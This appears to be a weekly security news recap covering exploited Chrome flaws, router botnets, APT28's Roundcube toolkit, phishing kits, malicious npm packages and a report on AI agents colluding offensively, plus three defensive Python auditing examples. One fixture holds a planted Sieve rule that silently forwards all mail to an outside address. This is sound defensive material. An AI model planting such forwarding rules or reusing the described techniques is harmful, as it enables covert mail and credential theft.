Some weeks in security feel routine. Then you read a few tabs and get that quick “ah, great, we’re doing this now” feeling.
This week has that energy. New messes, old problems getting sharper, and research that stops feeling theoretical real fast. A few bits hit a little too close to real life, too. There’s a mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the usual reminder that attackers will use anything that works.
Scroll on. You’ll see what I mean.
⚡ Threat of the Week
Google Patches 2 Actively Exploited Chrome 0-Days — Google released security updates for its Chrome web browser to address two high-severity vulnerabilities that it said have been exploited in the wild. The vulnerabilities relate to an out-of-bounds write in the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation in the V8 JavaScript and WebAssembly engine (CVE-2026-3910) that could lead to out-of-bounds memory access or code execution, respectively. Google didn’t share additional details about the flaws, but acknowledged that exploits exist for both of them. The issues have been addressed in Chrome versions 146.0.7680.75/76 for Windows and Apple macOS, and 146.0.7680.75 for Linux.
🔔 Top News
- Meta to Discontinue Instagram E2EE in May 2026 — Meta announced plans to discontinue support for end-to-end encryption (E2EE) for chats on Instagram after May 8, 2026. In a statement shared with The Hacker News, a Meta spokesperson said, “Very few people were opting in to end-to-end encrypted messaging in DMs, so we’re removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp.”
- Authorities Disrupt SocksEscort Service — A court-authorized international law enforcement operation dismantled a criminal proxy service named SocksEscort that enslaved thousands of residential routers worldwide into a botnet for committing large-scale fraud. “The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers,” the U.S. Justice Department said. The main thing to note here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly target MIPS and ARM architectures via known security flaws in edge network devices. The malware also featured a novel persistence mechanism that involved flashing custom firmware, which deliberately disables future updates, permanently turning SOHO routers into SocksEscort proxy nodes and blindsiding corporate monitoring.
- UNC6426 Exploits nx npm Supply Chain Attack to Gain AWS Admin Access in 72 Hours — A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package in August 2025 to completely breach a victim’s AWS environment within 72 hours. UNC6426 used the access to abuse the GitHub-to-AWS OpenID Connect (OIDC) trust and create a new administrator role in the cloud environment, Google said. Subsequently, this role was abused to exfiltrate files from the customer’s Amazon Web Services (AWS) Simple Storage Service (S3) buckets and perform data destruction in their production cloud environments.
- KadNap Enslaves Network Devices to Fuel Illegal Proxy — A takedown-resistant botnet comprising more than 14,000 routers and other network devices has been conscripted into a proxy network that anonymously ferries traffic used for cybercrime. The botnet, named KadNap, exploits known vulnerabilities in Asus routers (among others), leveraging the initial access to drop shell scripts that reach out to a peer-to-peer network based on Kademlia for decentralized control. Infected devices are being used to fuel a proxy service named Doppelganger that, for a fee, tunnels customers’ internet traffic through residential IP addresses, offering a way for attackers to blend in and make it harder to distinguish malicious traffic from legitimate activity.
- APT28 Strikes with Sophisticated Toolkit — The Russian threat actor known as APT28 has been observed using a bespoke toolkit in recent cyber espionage campaigns targeting Ukrainian cyber assets. The primary components of the toolkit are two implants, one of which employs techniques from a malware framework the threat actor used in the 2010s, while the other is a heavily modified version of the COVENANT framework for long-term spying. COVENANT is used in concert with BEARDSHELL to facilitate data exfiltration, lateral movement, and execution of PowerShell commands. Also alongside these tools is a malware named SLIMAGENT that shares overlaps with XAgent.
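The UNC6426 item above turns on one detail: a GitHub-to-AWS OIDC trust that let a workflow mint an administrator role. An IAM role's trust policy is only as tight as its Condition block, and the usual mistakes are a `sub` claim that matches any repository or any branch, or no `aud` check at all. The following is an added example written for this recap, not code from Google's report; it audits a trust policy document for exactly those gaps. It assumes the standard GitHub provider name, `token.actions.githubusercontent.com`, and the two policies it ships with are constructed for illustration.

```python
"""Audit an IAM role trust policy for an over-broad GitHub Actions OIDC trust.

Added example for this recap; it is not code from the original article or from
Google's report on UNC6426. It assumes the standard GitHub OIDC provider
(token.actions.githubusercontent.com) and the sub/aud claims AWS documents for
it. The two policies below are constructed for illustration.
"""

GITHUB_ISSUER = "token.actions.githubusercontent.com"
SUB_KEY = GITHUB_ISSUER + ":sub"
AUD_KEY = GITHUB_ISSUER + ":aud"

# Constructed: trusts any repo under the "acme" org, on any branch, with no audience check.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "arn:aws:iam::123456789012:oidc-provider/" + GITHUB_ISSUER},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringLike": {SUB_KEY: "repo:acme/*"}},
    }],
}

# Constructed: trusts one repo, one branch, and checks the audience.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "arn:aws:iam::123456789012:oidc-provider/" + GITHUB_ISSUER},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": {
            AUD_KEY: "sts.amazonaws.com",
            SUB_KEY: "repo:acme/payments:ref:refs/heads/main",
        }},
    }],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _trusts_github_oidc(statement):
    principal = statement.get("Principal")
    if not isinstance(principal, dict):
        return False
    return any(GITHUB_ISSUER in arn for arn in _as_list(principal.get("Federated", [])))


def audit_trust_policy(policy):
    """Return a list of findings; an empty list means every GitHub OIDC statement is pinned."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or not _trusts_github_oidc(stmt):
            continue
        # Flatten {"StringLike": {key: values}, ...} into (operator, key, value) triples.
        triples = [(op, key, val)
                   for op, kv in stmt.get("Condition", {}).items()
                   for key, vals in kv.items()
                   for val in _as_list(vals)]
        subs = [(op, val) for op, key, val in triples if key == SUB_KEY]
        auds = [val for _op, key, val in triples if key == AUD_KEY]

        if not subs:
            findings.append(f"statement {idx}: no {SUB_KEY} condition, so a workflow in any GitHub repository can assume this role")
        for op, sub in subs:
            parts = sub.split(":")
            repo = parts[1] if len(parts) > 1 else ""
            if parts[0] != "repo" or not repo or "*" in repo or "?" in repo:
                findings.append(f"statement {idx}: sub {sub!r} does not pin a single repository")
            elif "StringLike" in op and parts[-1] == "*":
                findings.append(f"statement {idx}: sub {sub!r} accepts any branch, tag, or environment of that repository")
        if "sts.amazonaws.com" not in auds:
            findings.append(f"statement {idx}: no {AUD_KEY} condition; tokens minted for another audience are accepted")
    return findings


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, audit_trust_policy(policy) or ["ok"])
```

In a real account you would feed `audit_trust_policy()` the `AssumeRolePolicyDocument` of every role returned by `iam:ListRoles`. One caveat the incident itself makes plain: a `sub` pinned to one repository and branch still trusts whoever can push a workflow to that branch, and stolen GitHub tokens are exactly that access. The trust policy narrows the blast radius; branch protection and short-lived, least-privilege role permissions have to do the rest.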
🔥 Trending CVEs
New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The issues below are this week’s most critical: high-severity, widely used software, or already drawing attention from the security community.
Check these first, patch what applies, and don’t wait on the ones marked urgent: CVE-2026-3909, CVE-2026-3910, CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Ultimate Security), CVE-2026-26224, CVE-2026-26225 (Intego X9), CVE-2026-29000 (pac4j-jwt), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 (PostgreSQL), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Pro WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Broker VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS).
🎥 Cybersecurity Webinars
- Stop Guessing: Automate Your Defense Against Real-World Attacks → Learn to move beyond basic security checklists by using automation to test your defenses against real-world attacks. Experts will show you why traditional testing often fails and how to use continuous, data-driven tools to find and fix gaps in your security. You’ll learn how to prove your security actually works without increasing your manual workload.
- Fix Your Identity Security: Closing the Gaps Before Hackers Find Them → This webinar covers a new study about why many companies are struggling to keep their user accounts and digital identities safe. Experts share findings from the Ponemon Institute on the biggest security gaps, such as disconnected apps and the new risks created by AI. You’ll learn simple, practical steps to fix these problems and get better control over who has access to your company’s data.
- The Ghost in the Machine: Securing the Secret Identities of Your AI Agents → As artificial intelligence (AI) begins to act on its own, businesses face a new challenge: how to give these “AI agents” the right digital IDs. This webinar explains why current security for humans doesn’t work for autonomous bots and how to build a better system to track what they do. You’ll learn simple, real-world steps to give AI agents secure identities and clear rules, ensuring they don’t accidentally expose your private company data.
📰 Around the Cyber World
- Fake Google Security Check Drops Browser RAT — A web page mimicking a Google Account security page has been observed delivering a fully featured browser-based surveillance toolkit that takes the form of a Progressive Web App (PWA). “Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents—all without installing a traditional app,” Malwarebytes said. “For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.”
- Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in attacks targeting Russia that led to the deployment of a previously undocumented remote access trojan called BlackReaperRAT and an updated version of the Blackout Locker ransomware, called Milkyway by the threat actors. BlackReaperRAT is capable of running commands via “cmd.exe,” uploading/downloading files, spawning an HTTP shell to receive commands, and spreading the malware to connected removable media. “It carries out destructive attacks against organizations across various sectors located within the Russian Federation,” BI.ZONE said. “The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena.”
- Chinese Hackers Target the Persian Gulf Region with PlugX — A China-nexus threat actor, suspected to be Mustang Panda, has targeted countries in the Persian Gulf region. The activity took place during the first 24 hours of the ongoing conflict in the Middle East late last month. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. “The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering,” Zscaler said. “The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution.”
- Phishing Campaign Uses SEO Poisoning to Steal Data — A phishing campaign has employed SEO poisoning to direct search engine results to fake traffic ticket portals that impersonate the Government of Canada and specific provincial agencies. “The campaign lures victims to a fake ‘Traffic Ticket Search Portal’ under the pretense of paying outstanding traffic violations,” Palo Alto Networks Unit 42 said. “Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers.” The phishing pages use a “waiting room” tactic where the victim’s browser polls the server every two seconds and triggers redirects based on specific status codes.
- Roundcube Exploitation Toolkit Discovered — Hunt.io said it discovered a Roundcube exploitation toolkit in an internet-exposed directory on 203.161.50[.]145. It is worth noting that Russian threat actors like APT28, Winter Vivern, and TAG-70 have repeatedly targeted Roundcube vulnerabilities to breach Ukrainian organizations. “The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application,” the company said, attributing it with medium to high confidence to APT28, citing overlaps with Operation RoundPress. The toolkit, dubbed Roundish, supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and two-factor authentication (2FA) secret extraction, mirroring a feature present in MDAEMON. One of the primary targets of the attack is mail.dmsu.gov[.]ua, a Roundcube webmail instance associated with Ukraine’s State Migration Service (DMSU). Beyond the possible shared development lineage, Roundish introduces four new components not previously documented in APT28 webmail activity, including a CSS-based side-channel module, a browser credential stealer, and a Go-based backdoor that provides persistence via cron, systemd, and SELinux. The CSS injection component is designed to progressively extract characters from Roundcube’s document object model (DOM) without injecting any JavaScript into the victim’s page. The technique is likely used to target Cross-Site Request Forgery (CSRF) tokens or email UIDs.
Central to the Roundish toolkit is an XSS payload engineered to steal the victim’s email address, harvest account credentials, redirect all incoming emails to a Proton Mail address, export mailbox data from the victim’s Inbox and Sent folders, and gather the victim’s full address book. “The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access,” Hunt.io said. “From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset.”
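The “waiting room” behaviour in the Unit 42 item above is a signal in its own right: a real page is not fetched on a two-second metronome, so the cadence shows up in proxy logs even when the domain is brand new. The following is an added example written for this recap, not code from Unit 42; it groups requests by client and path and flags any pair hit at a steady interval near two seconds. It assumes a simple space-separated log format (timestamp, client IP, method, URL, status) that is constructed for the example, as are the log lines themselves.

```python
"""Flag the "waiting room" cadence: one client re-requesting one path on a fixed short timer.

Added example for this recap, not code from Unit 42's write-up. It assumes a
simple space-separated proxy log (timestamp, client IP, method, URL, status);
adapt parse_line() to your proxy's format. The log lines are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev
from urllib.parse import urlsplit

SAMPLE_LOG = """\
2026-03-12T10:00:00.000Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 204
2026-03-12T10:00:02.010Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 204
2026-03-12T10:00:04.020Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 204
2026-03-12T10:00:06.000Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 204
2026-03-12T10:00:08.030Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 204
2026-03-12T10:00:10.010Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 204
2026-03-12T10:00:12.050Z 10.0.0.5 GET https://ticket-pay.example/wait?s=7f3a 302
2026-03-12T10:00:12.300Z 10.0.0.5 GET https://ticket-pay.example/pay 200
2026-03-12T10:00:01.000Z 10.0.0.9 GET https://cdn.example/app.js 200
2026-03-12T10:00:01.500Z 10.0.0.9 GET https://cdn.example/app.js 304
2026-03-12T10:00:20.000Z 10.0.0.9 GET https://cdn.example/app.js 304
2026-03-12T10:00:21.000Z 10.0.0.9 GET https://cdn.example/app.js 304
2026-03-12T10:00:50.000Z 10.0.0.9 GET https://cdn.example/app.js 304
"""


def parse_line(line):
    """Return (timestamp, client_ip, host+path, status); the query string is dropped
    because a kit's polling URL typically carries a per-victim token."""
    ts, ip, _method, url, status = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")
    u = urlsplit(url)
    return when, ip, u.netloc + u.path, int(status)


def find_polling_clients(lines, period=2.0, jitter=0.25, min_requests=5):
    """Return [(client_ip, host+path, request_count, median_gap_seconds)] for every
    client that hits the same path at a steady cadence close to `period` seconds."""
    by_key = defaultdict(list)
    for line in lines:
        if line.strip():
            when, ip, key, _status = parse_line(line)
            by_key[(ip, key)].append(when)

    hits = []
    for (ip, key), times in by_key.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Steady timer: typical gap near the period, and little variation between gaps.
        if abs(median(gaps) - period) <= jitter and pstdev(gaps) <= jitter:
            hits.append((ip, key, len(times), round(median(gaps), 2)))
    return hits


if __name__ == "__main__":
    for hit in find_polling_clients(SAMPLE_LOG.splitlines()):
        print("polling pattern:", hit)
```

The repeated fetches of `cdn.example/app.js` in the sample are there to show the negative case: five requests to one path is not enough on its own, the gaps have to be regular. Legitimate long-polling and health-check endpoints will also match, so treat a hit as a pivot to the final redirect target, not as a verdict.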
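Hunt.io's closing advice, that forwarding rules and Sieve filters must be audited after a Roundcube compromise, is easy to skip because the rules live in the managesieve store rather than in the mailbox. The following is an added example for this recap, not code from Hunt.io or Roundcube; it scans a Sieve script for `redirect` actions and rates each by whether mail leaves your domains and whether the owner still gets a copy. It assumes you can export the scripts as plain Sieve text and that you know your own mail domains; the script it checks is constructed.

```python
"""Audit Sieve scripts for mail-forwarding persistence of the kind Roundish plants.

Added example for this recap, not code from Hunt.io's report. It assumes the
scripts are plain Sieve text (Roundcube's managesieve plugin stores them that
way) and that you know your own mail domains; anything redirected elsewhere is
treated as external. The script below is constructed.
"""
import re

# redirect [:copy] [:list] "address" ; captures the tag list and the quoted address.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"', re.IGNORECASE)
# Sieve comments: "#" to end of line and /* ... */ blocks. A "#" inside a quoted
# string would also be stripped; acceptable for an audit, not for a parser.
COMMENT_RE = re.compile(r'/\*.*?\*/|#[^\n]*', re.DOTALL)

SAMPLE_SCRIPT = """\
require ["fileinto", "copy"];
# rule:[Junk]
if header :contains "X-Spam-Flag" "YES" { fileinto "Junk"; }
# rule:[assistant]
if address :is "to" "director@dmsu.example" { redirect :copy "assistant@dmsu.example"; }
# rule:[sync]   <- planted: every message leaves, and the victim never sees it
if true
{
    redirect "mailsync-7781@example.net";
    stop;
}
# redirect "old-forward@example.org";   (commented out, must not be flagged)
"""


def audit_sieve(script, internal_domains):
    """Return one finding per redirect action, rated by whether the mail leaves the
    organisation and whether the owner still receives a local copy."""
    internal = {d.lower() for d in internal_domains}
    findings = []
    clean = COMMENT_RE.sub("", script)  # ignore commented-out rules
    for m in REDIRECT_RE.finditer(clean):
        tags, address = m.group(1).lower(), m.group(2)
        domain = address.rsplit("@", 1)[-1].lower()
        external = domain not in internal
        # Without :copy, redirect cancels the implicit keep: nothing lands in the Inbox.
        silent = ":copy" not in tags
        if external and silent:
            severity = "high"
        elif external:
            severity = "medium"
        else:
            severity = "low"
        findings.append({"address": address, "external": external,
                         "silent": silent, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SCRIPT, ["dmsu.example"]):
        print(f)
```

Run it over every user's active script, not just the compromised accounts, since the XSS payload ran in whichever sessions opened the lure. Forwarding can also be configured outside Sieve (IMAP server settings, a `.forward` file, or the mail gateway), so this is one of several places to look.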
- Phishing Campaign Targeting AWS Console Credentials — An active adversary-in-the-middle (AiTM) phishing campaign is using fake security alert emails to steal AWS Console credentials, per Datadog. “The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes,” the company said. “This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure.” Post-compromise console access has been observed within 20 minutes of credential submission. These efforts originated from Mullvad VPN infrastructure. Because the kit relays the login to the real endpoint as it happens, a TOTP or SMS code is captured and replayed just like the password; only origin-bound factors such as FIDO2 security keys or passkeys resist this style of proxying.
- Malicious npm Packages Deliver Cipher Stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, have been found to deliver, via Dropbox, a Windows executable named Cipher stealer that siphons sensitive data from compromised hosts, including Discord tokens, credentials from Chrome, Edge, Opera, Brave, and Yandex browsers, and seed files from cryptocurrency wallet apps like Exodus. “The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub,” JFrog said.
- GIBCRYPTO Ransomware Detailed — A new ransomware called GIBCRYPTO comes with the ability to capture keystrokes and corrupt the Master Boot Record (MBR) so that any attempt to restart the system will cause it to run into an error. The ransomware uses the Salsa20 algorithm for encryption. It is suspected to be part of Snake Keylogger, indicating the malware authors’ attempts to diversify beyond information theft. The development comes as Sygnia highlighted SafePay’s OneDrive-based data exfiltration technique during a ransomware attack after breaching a victim by leveraging a FortiGate firewall flaw and a misconfigured administrative account. “SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials,” the company said. “They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access.” The attack culminated in the deployment of ransomware, encrypting more than 60 servers.
- Fraudulent Account Registration Activity Originating from Vietnam — A sprawling cybercrime ecosystem based in Vietnam has been linked to a cluster of fraudulent account registration activity on platforms like LinkedIn, Instagram, Facebook, and TikTok. In these attacks, attributed to O-UNC-036, the threat actors rely on disposable email addresses to execute SMS pumping attacks, also known as International Revenue Sharing Fraud (IRSF). “In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider,” Okta said. “Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes.” O-UNC-036 has also been linked to a cybercrime-as-a-service (CaaS) ecosystem that provides paid infrastructure and services to facilitate online fraud. The web-based storefronts are hosted in Vietnam and specialize in the sale of web-based accounts.
- Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Web SDK was briefly hijacked to serve malicious code that steals cryptocurrency, in a supply chain attack. The clipper payload came with capabilities to intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses to divert funds to the threat actor. “The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com,” Profero said. “The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic.” The incident has since been resolved by AppsFlyer.
- Operation CamelClone Targets Government and Defense Entities — A new cyber espionage campaign dubbed Operation CamelClone has targeted government and defense entities in Algeria, Mongolia, Ukraine, and Kuwait using malicious ZIP archives that contain a Windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers additional payloads for establishing C2 and exfiltrating data to the MEGA cloud storage service. “One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure,” Seqrite Labs said. “Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone.” The activity has not been attributed to any known threat group.
- How Threat Actors Exfiltrate Credentials Using Telegram Bots — Threat actors are abusing the Telegram Bot API to exfiltrate data via text messages or arbitrary file uploads, highlighting how legitimate services can be weaponized to evade detection. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram for C2. “In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram’s technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers,” Cofense said.
- Microsoft Launches Copilot Health — Microsoft has become the latest company after OpenAI and Anthropic to launch a dedicated “secure space” called Copilot Health that integrates medical records, biometric data from wearables, and lab test results to give personalized advice in the U.S. “Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story,” the company said. Like OpenAI and Anthropic, Microsoft emphasized that Copilot Health is not meant to replace professional medical care.
- Rogue AI Agents Can Work Together to Engage in Offensive Behaviors — According to a new report from artificial intelligence (AI) security company Irregular, agents can work together to hack into systems, escalate privileges, disable endpoint protection, and steal sensitive data while evading pattern-matching defenses. What is notable is that the experiment did not rely on adversarial prompting or deliberately unsafe system design. “In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation,” Irregular said. “This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways.”
🔧 Cybersecurity Tools
- Dev Machine Guard → It is a free, open-source tool that scans your computer to show you exactly what developer tools and scripts are running. It creates a simple list of your AI coding assistants, code editor extensions, and software packages to help you find anything suspicious or outdated. It is a single script that runs in seconds to give you better visibility into the security of your local coding environment.
- Trajan → It is an automated security tool designed to find hidden vulnerabilities in “service meshes,” which are the systems that manage how different parts of a large software application talk to each other. Because these systems are complex, it is easy for engineers to make small mistakes in the settings that let attackers bypass security or steal data. Trajan works by scanning these configurations to spot those specific mistakes and helping developers fix them before they can be exploited.
Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.
Conclusion
There’s a lot packed in here, and not in a neat way. Some of it is the classic recycled chaos, some of it feels a little more deliberate, and some of it has that nasty “this is going to show up everywhere by next week” energy.
Anyway — enough throat-clearing. Here’s the stuff worth your attention.